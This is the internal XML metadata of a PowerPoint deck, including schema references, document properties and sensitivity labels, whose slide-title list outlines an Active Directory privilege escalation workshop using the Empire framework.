  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="76927355-584f-4bc3-9b09-55987a89d7dc" xmlns:ns3="815a20d1-38b0-43c4-8b87-0ea2d0614826" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="388e002c9608a80f0303991424868dae" ns2:_="" ns3:_="">
    <xsd:import namespace="76927355-584f-4bc3-9b09-55987a89d7dc"/>
    <xsd:import namespace="815a20d1-38b0-43c4-8b87-0ea2d061482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27355-584f-4bc3-9b09-55987a89d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5a20d1-38b0-43c4-8b87-0ea2d06148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E72791-78CC-413B-BA4A-2C6FFC8617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927355-584f-4bc3-9b09-55987a89d7dc"/>
    <ds:schemaRef ds:uri="815a20d1-38b0-43c4-8b87-0ea2d0614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266D1F-95B3-40D3-99D3-F56DAE7921DA}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{45807E26-D299-45B2-9563-423A25789FF5}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <ds:schemaRef ds:uri="815a20d1-38b0-43c4-8b87-0ea2d0614826"/>
    <ds:schemaRef ds:uri="76927355-584f-4bc3-9b09-55987a89d7dc"/>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Slide Template</Template>
  <TotalTime>4561</TotalTime>
  <Words>8004</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>624</Paragraphs>
  <Slides>48</Slides>
  <Notes>48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Courier New</vt:lpstr>
      <vt:lpstr>System Font Regular</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>SANS</vt:lpstr>
      <vt:lpstr>Rollover</vt:lpstr>
      <vt:lpstr>AD privilege escalation workshop with Empire</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Environment Prep and Spinning up</vt:lpstr>
      <vt:lpstr>Intro to AD and Empire</vt:lpstr>
      <vt:lpstr>Intro to Active Directory</vt:lpstr>
      <vt:lpstr>Why Should We Care about AD?</vt:lpstr>
      <vt:lpstr>Which Components Can Be Found in AD?</vt:lpstr>
      <vt:lpstr>Trees &amp; Forests</vt:lpstr>
      <vt:lpstr>Example Trust Configuration</vt:lpstr>
      <vt:lpstr>Command and Control</vt:lpstr>
      <vt:lpstr>C2 infrastructure</vt:lpstr>
      <vt:lpstr>Listeners</vt:lpstr>
      <vt:lpstr>Communication Channels</vt:lpstr>
      <vt:lpstr>Empire</vt:lpstr>
      <vt:lpstr>Empire</vt:lpstr>
      <vt:lpstr>Initial Empire Setup and Agent Callback</vt:lpstr>
      <vt:lpstr>Kerberos authentication</vt:lpstr>
      <vt:lpstr>Kerberos Authentication</vt:lpstr>
      <vt:lpstr>Kerberos Authentication: Key Types</vt:lpstr>
      <vt:lpstr>Kerberos Authentication: AS-REQ</vt:lpstr>
      <vt:lpstr>Kerberos Authentication: Ticket Granting Ticket</vt:lpstr>
      <vt:lpstr>Kerberos Authentication: Service Ticket</vt:lpstr>
      <vt:lpstr>Kerberoasting and DCSyncing</vt:lpstr>
      <vt:lpstr>Kerberoasting</vt:lpstr>
      <vt:lpstr>Kerberoasting Tips and Tricks</vt:lpstr>
      <vt:lpstr>DCSync</vt:lpstr>
      <vt:lpstr>DCSync with Mimikatz</vt:lpstr>
      <vt:lpstr>Kerberoasting, Lateral Movement and DCSYNC</vt:lpstr>
      <vt:lpstr>Hopping the Trust</vt:lpstr>
      <vt:lpstr>Hopping the Trust: Parent/Child</vt:lpstr>
      <vt:lpstr>Adding Some History in Our Tickets</vt:lpstr>
      <vt:lpstr>Golden Ticket</vt:lpstr>
      <vt:lpstr>How to Execute SID History Attacks</vt:lpstr>
      <vt:lpstr>Hopping the Trust: Parent/Child: C2s</vt:lpstr>
      <vt:lpstr>Hopping the Trust: Tree Root</vt:lpstr>
      <vt:lpstr>Delegation</vt:lpstr>
      <vt:lpstr>Unconstrained Delegation</vt:lpstr>
      <vt:lpstr>Unconstrained Delegation Flow</vt:lpstr>
      <vt:lpstr>Recognizing Unconstrained Delegation</vt:lpstr>
      <vt:lpstr>Forceful Authentication</vt:lpstr>
      <vt:lpstr>PrintSpooler</vt:lpstr>
      <vt:lpstr>PetitPotam</vt:lpstr>
      <vt:lpstr>Unconstrained Delegation + Forced Authentication</vt:lpstr>
      <vt:lpstr>Rubeus for Unconstrained Delegation Abuse</vt:lpstr>
      <vt:lpstr>Unconstrained Delegation and Empire</vt:lpstr>
      <vt:lpstr>Hopping Trusts</vt:lpstr>
      <vt:lpstr>Thank you and hopefully see you again soon!</vt:lpstr>
      <vt:lpstr>Contacts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Hertan, Karen</dc:creator>
  <cp:lastModifiedBy>Jean-Francois Maes</cp:lastModifiedBy>
  <cp:revision>312</cp:revision>
  <cp:lastPrinted>2024-10-10T17:37:53Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-19T22:43:17Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-21T13:11:58Z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0x01010065462DE8F92A7542BFDC3C3834D85FF4</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Order">
    <vt:r8>65500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MSIP_Label_863aae98-72c2-4d8a-bcb0-c0aa81d8aedc_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MSIP_Label_863aae98-72c2-4d8a-bcb0-c0aa81d8aedc_SetDate">
    <vt:lpwstr>2021-04-08T18:35:00Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="MSIP_Label_863aae98-72c2-4d8a-bcb0-c0aa81d8aedc_Method">
    <vt:lpwstr>Standard</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="MSIP_Label_863aae98-72c2-4d8a-bcb0-c0aa81d8aedc_Name">
    <vt:lpwstr>General</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="12" name="MSIP_Label_863aae98-72c2-4d8a-bcb0-c0aa81d8aedc_SiteId">
    <vt:lpwstr>a5a9530b-9623-4712-8f71-f7cb8dfe5b51</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="13" name="MSIP_Label_863aae98-72c2-4d8a-bcb0-c0aa81d8aedc_ActionId">
    <vt:lpwstr>34e9c7fe-8c76-4978-a7bd-8b98865eb29a</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="14" name="MSIP_Label_863aae98-72c2-4d8a-bcb0-c0aa81d8aedc_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="15" name="MSIP_Label_2c3a6615-7512-4c11-aca8-4be6e4425a0e_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="16" name="MSIP_Label_2c3a6615-7512-4c11-aca8-4be6e4425a0e_SetDate">
    <vt:lpwstr>2024-10-16T00:40:23Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="17" name="MSIP_Label_2c3a6615-7512-4c11-aca8-4be6e4425a0e_Method">
    <vt:lpwstr>Standard</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="18" name="MSIP_Label_2c3a6615-7512-4c11-aca8-4be6e4425a0e_Name">
    <vt:lpwstr>Neuvik Internal</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="19" name="MSIP_Label_2c3a6615-7512-4c11-aca8-4be6e4425a0e_SiteId">
    <vt:lpwstr>8dd39009-6627-4ddf-8e37-a453143ddcf0</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="20" name="MSIP_Label_2c3a6615-7512-4c11-aca8-4be6e4425a0e_ActionId">
    <vt:lpwstr>9eee3b9f-39f8-4675-8af1-775e08793924</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="21" name="MSIP_Label_2c3a6615-7512-4c11-aca8-4be6e4425a0e_ContentBits">
    <vt:lpwstr>2</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="22" name="ClassificationContentMarkingFooterLocations">
    <vt:lpwstr>SANS:10\Rollover:3</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="23" name="ClassificationContentMarkingFooterText">
    <vt:lpwstr>Neuvik Internal</vt:lpwstr>
  </property>
</Properties>
</file>